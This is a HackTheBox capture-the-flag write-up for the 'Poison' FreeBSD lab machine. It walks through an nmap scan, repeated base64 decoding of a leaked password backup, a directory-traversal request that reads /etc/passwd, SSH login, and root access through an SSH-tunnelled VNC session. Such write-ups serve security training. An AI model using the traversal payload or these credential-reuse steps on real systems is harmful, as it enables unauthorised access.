HackTheBox Poison Writeup

1/31/2024

Explore the step-by-step process of hacking into the Poison machine on HackTheBox, a renowned platform for honing cybersecurity skills through hands-on challenges. This detailed writeup provides insights into the techniques, tools, and methodologies used to root the box.

Overview

I started this box because it was made with a Medium difficulty tag and it was running FreeBSD. But after finishing the machine, I think it should have been marked as an easy machine.

The box requires some knowledge of VNC and X Window Authorization. However, it is relatively simple otherwise.

Enumeration

The IP of the machine is 10.10.10.84

Nmap

nmap -sC -sV -oA nmap/Poison 10.10.10.84

nmap scan results

We see that port 22 and port 80 are open.

Webserver (Port 80)

Webpage

Typing listfiles.php returns:

Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )

Let's try to access this file. By putting this filename in the Scriptname section.

pwdbackup.txt

This is base64 and it looks like it has been encoded 13 times. Quick bash script to decode this. We run a for loop 13 times and decode it.

#!/bin/bash file="passwd.txt" temp_file=$(mktemp) # There are spaces in the file that shouldn't be there. sed 's/ //g' "$file" > "$temp_file" mv "$temp_file" "$file" for (( i=1; i<=13; i++ )) do base64 -d "$file" > "$file.tmp" && mv "$file.tmp" "$file" done cat $file

We get the password Charix!2#4%6&8(0, We don't know what this is used for and don't have any username to try the SSH.

So let us try a directory traversal attack to see if we can get the /etc/passwd file.

http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd

/etc/passwd

The username is charix.

Initial Foothold

ssh (port 22)

Now that we have the credentials, we can try to log in to ssh.

ssh connection

Privilege Escalation

We get secret.zip which is an encrypted file. Unfortunately, I cannot type any password in the ssh connection so I will move the file out using scp.

scp [email protected]:/home/charix/secret.zip secret.zip

Decrypting it gives us a binary file secret. Right now we do not have a use for this file. So, back to enumeration.

charix@Poison:~ % ps -auwwx USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND . . . root 529 0.0 0.9 23620 8868 v0- I 00:48 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1 . . . charix 922 0.0 0.3 21208 2652 1 R+ 02:59 0:00.00 ps -auwwx

We see a vnc session that runs with root privileges on port 5901. We have the secret binary and that could used for cookie-based authentication.

For us to try it we need access to the vnc port (no point connecting to vnc in ssh). This is a worthy shot, try for the lowest hanging fruits first.

ssh -L5901:127.0.0.1:5901 [email protected]

Now we can access the port on localhost:5901.

vncviewer 127.0.0.1:5901 -passwd secret

vncviewer

Rooted